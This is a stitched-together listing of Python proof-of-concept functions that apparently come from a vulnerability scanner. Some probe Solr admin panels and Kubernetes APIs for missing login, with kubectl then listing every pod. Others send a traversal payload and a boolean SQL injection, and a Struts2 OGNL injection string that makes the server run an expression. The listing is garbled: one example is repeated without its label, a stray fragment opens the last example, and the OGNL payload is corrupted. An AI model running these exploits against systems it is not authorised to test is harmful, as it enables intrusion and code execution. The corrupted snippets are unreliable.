示例#1
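def poc(target):
    """Report whether *target* serves a Solr admin dashboard without login.

    Every candidate URL produced by ``iterate_path`` is requested as given
    and again with ``/solr/`` appended. A hit is an HTTP 200 response whose
    body contains both ``Solr Admin`` and ``Dashboard``.

    Returns the first matching URL, or ``False`` when nothing matched.
    """
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            for url in (each, each + '/solr/'):
                # Without a timeout one silent host stalls the whole scan.
                g = requests.get(url,
                                 headers={'User-Agent': firefox()},
                                 timeout=10)
                # "==" rather than "is": identity of ints is an interpreter
                # detail. Bytes literals keep the body test valid on both
                # Python 2 (str) and Python 3 (bytes).
                if (g.status_code == 200 and b'Solr Admin' in g.content
                        and b'Dashboard' in g.content):
                    return url
        except Exception:
            # Best-effort scan: an unreachable candidate is skipped, not fatal.
            continue
    return False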
示例#2
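def poc(target):
    """Report whether *target* serves a Solr admin dashboard without login.

    Every candidate URL produced by ``iterate_path`` is requested as given
    and again with ``/solr/`` appended. A hit is an HTTP 200 response whose
    body contains both ``Solr Admin`` and ``Dashboard``.

    Returns the first matching URL, or ``False`` when nothing matched.
    """
    base_url = target if "://" in target else 'http://' + target
    for each in iterate_path(base_url):
        try:
            for url in (each, each + '/solr/'):
                # Without a timeout one silent host stalls the whole scan.
                g = requests.get(url,
                                 headers={'User-Agent': firefox()},
                                 timeout=10)
                # "==" rather than "is": identity of ints is an interpreter
                # detail. Bytes literals keep the body test valid on both
                # Python 2 (str) and Python 3 (bytes).
                if (g.status_code == 200 and b'Solr Admin' in g.content
                        and b'Dashboard' in g.content):
                    return url
        except Exception:
            # Best-effort scan: an unreachable candidate is skipped, not fatal.
            continue
    return False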
示例#3
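def poc(url):
    """Check a ``host:port`` target for a Solr admin dashboard without login.

    Targets whose port is in the non-HTTP service list are skipped. Port 443
    is requested over HTTPS on the default port, 8443 over HTTPS with the
    port kept, everything else over plain HTTP. ``/`` and ``/solr/`` are
    tried in turn.

    Returns ``'[solr unauth]\\t<url>'`` on a hit, otherwise ``False``
    (including for input that is not ``host:port``).
    """
    portlist = [
        '21', '22', '23', '25', '53', '110', '137', '161', '389', '445', '873',
        '1090', '1099', '1433', '1521', '2049', '2181', '2222', '2375', '3306',
        '3389', '5432', '5901', '5984', '6379', '11211', '27017'
    ]
    parts = url.split(':')
    if len(parts) < 2:
        # No port component: previously an IndexError.
        return False
    port = parts[1]
    if port in portlist:
        return False
    if not port.isdigit():
        # Non-numeric port: previously a ValueError from int().
        return False

    if int(port) == 443:
        base = 'https://' + parts[0]
    elif int(port) == 8443:
        base = 'https://' + url
    else:
        base = 'http://' + url

    try:
        # Silence InsecureRequestWarning, which verify=False would trigger.
        requests.packages.urllib3.disable_warnings()
        for path in ('/', '/solr/'):
            # Build each candidate from the base; appending to the previous
            # candidate produced "//solr/" on the second pass.
            candidate = base + path
            # verify=False: the certificate is not checked, so a response
            # does not prove which host answered.
            g = requests.get(candidate,
                             headers={'User-Agent': firefox()},
                             verify=False,
                             timeout=5)
            if (g.status_code == 200 and b'Solr Admin' in g.content
                    and b'Dashboard' in g.content):
                return '[solr unauth]\t' + candidate
    except Exception:
        # As before, the first failed request ends the check for this target.
        return False
    return False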
示例#4
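def poc(url):
    """Check whether the encoded-traversal path returns ``MANIFEST.MF``.

    The scheme defaults to ``http://``, the URL is reduced with
    ``get_domain`` and the fixed path is requested once.

    Returns ``True`` when the response looks like a JAR manifest, otherwise
    ``False`` (also on any request error).
    """
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        resp = requests.get(url + payload,
                            headers={'User-Agent': firefox()},
                            timeout=10)
        body = resp.content
        status = resp.status_code
    except Exception:
        return False
    # The bare word "Version" also occurs on error pages and ordinary HTML,
    # which made any such page a positive. Require a 200 and the header
    # that opens every JAR manifest.
    return status == 200 and b'Manifest-Version' in body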
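def poc(url):
    """Check whether the encoded-traversal path returns ``MANIFEST.MF``.

    The scheme defaults to ``http://``, the URL is reduced with
    ``get_domain`` and the fixed path is requested once.

    Returns ``True`` when the response looks like a JAR manifest, otherwise
    ``False`` (also on any request error).
    """
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        resp = requests.get(url + payload,
                            headers={'User-Agent': firefox()},
                            timeout=10)
        body = resp.content
        status = resp.status_code
    except Exception:
        return False
    # The bare word "Version" also occurs on error pages and ordinary HTML,
    # which made any such page a positive. Require a 200 and the header
    # that opens every JAR manifest.
    return status == 200 and b'Manifest-Version' in body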
示例#6
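def poc(url):
    """Check whether *url* evaluates the ``debug=browser`` request parameters.

    The query string is dropped, ``redirectURL`` resolves a URL lacking
    ``.action``, and one GET asks the server to print a random key. A hit is
    a response that contains the key but not ``xwork2.dispatcher``
    (presumably to exclude pages that merely reflect the query string).
    A hit means the application is running with the framework's development
    mode on, which should be disabled outside development.

    Returns the tested URL on a hit, otherwise ``False``.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception:
            # One unresolvable target should not abort a multi-target run.
            return False
    key = randomString()
    # NOTE(review): the literal contains "[email protected]", which looks like an
    # e-mail-obfuscation artefact from the page this listing was copied from;
    # results from the string as listed are not reliable.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception:
        # "except Exception, e" is Python-2-only syntax and e was unused.
        return False
    # The original fell off the end (None) on a negative result.
    return False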
示例#7
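def poc(url):
    """Check whether *url* evaluates the ``debug=browser`` request parameters.

    The query string is dropped, ``redirectURL`` resolves a URL lacking
    ``.action``, and one GET asks the server to print a random key. A hit is
    a response that contains the key but not ``xwork2.dispatcher``
    (presumably to exclude pages that merely reflect the query string).
    Request errors are logged at debug level.

    Returns the tested URL on a hit, otherwise ``False``.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception as e:
            # One unresolvable target should not abort a multi-target run.
            logging.debug(e)
            return False
    key = randomString()
    # NOTE(review): the literal contains "[email protected]", which looks like an
    # e-mail-obfuscation artefact from the page this listing was copied from;
    # results from the string as listed are not reliable.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception as e:
        # "as" works on Python 2.6+ and 3; the comma form is 2-only.
        logging.debug(e)
    # Explicit negative result instead of an implicit None.
    return False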
示例#8
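def poc(url):
    """Boolean-difference check of the ``galleryid`` POST parameter.

    ``get_entry`` supplies the endpoint. When ``CHECK_WAF`` is set and
    ``has_waf`` reports a WAF, the result is marked uncertain. Otherwise the
    same form is posted twice, once with an always-true and once with an
    always-false condition, and the two responses are compared.

    Returns ``True`` when both responses are 200 and differ in length, the
    ``'[Uncertain,WAF detected!] <domain>'`` string when a WAF was seen, and
    ``False`` otherwise.
    """
    target = get_entry(url)
    if not target:
        return False

    if CHECK_WAF and has_waf(target):
        return '[Uncertain,WAF detected!] ' + get_domain(target)

    data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"

    # The endpoint only parses the body when the form Content-Type is sent.
    headers = {'User-Agent': firefox(),
               'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        # Timeouts keep one unresponsive host from stalling the run.
        r1 = requests.post(target, headers=headers, timeout=10,
                           data=data_temp.replace('[P]', '-1 OR 1=1'))
        r2 = requests.post(target, headers=headers, timeout=10,
                           data=data_temp.replace('[P]', '-1 OR 1=2'))
    except Exception:
        # A bare "except:" also swallowed KeyboardInterrupt and SystemExit,
        # so Ctrl-C could not stop a scan at this point.
        return False
    # NOTE(review): a length difference alone can come from dynamic content
    # (timestamps, tokens), so a True here should be confirmed by hand.
    if r1.status_code == r2.status_code == 200 and len(r1.content) != len(r2.content):
        return True
    return False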
示例#9
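def poc(url):
    """Check whether a Kubernetes API endpoint answers without credentials.

    The URL is fetched once. If the reply is a 200 whose body mentions
    ``healthz`` and ``metrics``, ``kubectl`` is run against it to list pods
    in all namespaces. The endpoint is reported when that output contains
    neither a username prompt nor a server error.

    Returns *url* (with scheme) on a hit, otherwise ``False``.
    """
    if '://' not in url:
        url = 'http://' + url
    if '443' in url:
        # NOTE(review): substring test, so it also fires for a port such as
        # 4430 or a host whose address contains "443".
        url = url.replace('http:', 'https:')
    try:
        # verify=False: the certificate is not checked, so a response does
        # not prove which host answered.
        g = requests.get(url,
                         headers={'User-Agent': firefox()},
                         timeout=3,
                         verify=False)
        if g.status_code == 200 and b'healthz' in g.content and b'metrics' in g.content:
            # The target string comes from the scan input. Pass it as one
            # argv element with no shell, so metacharacters in it cannot run
            # commands on the scanning host.
            with open("/dev/null", "w") as devnull:
                pods = subprocess.Popen(
                    ["kubectl", "-s", url, "get", "pods",
                     "--all-namespaces=true", "-o=wide"],
                    stdout=subprocess.PIPE,
                    stdin=subprocess.PIPE,
                    stderr=devnull)
                output = pods.communicate()[0].decode("utf-8")
            if "Please enter Username" not in output and "Error from server" not in output:
                return url
    except Exception:
        # Best-effort: any failure counts as "not exposed".
        pass
    return False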
示例#10
"""

import requests
from plugin.useragent import firefox
from plugin.util import randomString, redirectURL


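def poc(url):
    """Check whether *url* evaluates the ``debug=browser`` request parameters.

    The query string is dropped, ``redirectURL`` resolves a URL lacking
    ``.action``, and one GET asks the server to print a random key. A hit is
    a response that contains the key but not ``xwork2.dispatcher``
    (presumably to exclude pages that merely reflect the query string).

    Returns the tested URL on a hit, otherwise ``False``.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    if '.action' not in url:
        try:
            url = redirectURL(url)
        except Exception:
            return False
    key = randomString()
    # NOTE(review): the literal contains "[email protected]", which looks like an
    # e-mail-obfuscation artefact from the page this listing was copied from;
    # results from the string as listed are not reliable.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    target = (url + payload)
    try:
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception:
        # "except Exception, e" is Python-2-only syntax and e was unused.
        return False
    return False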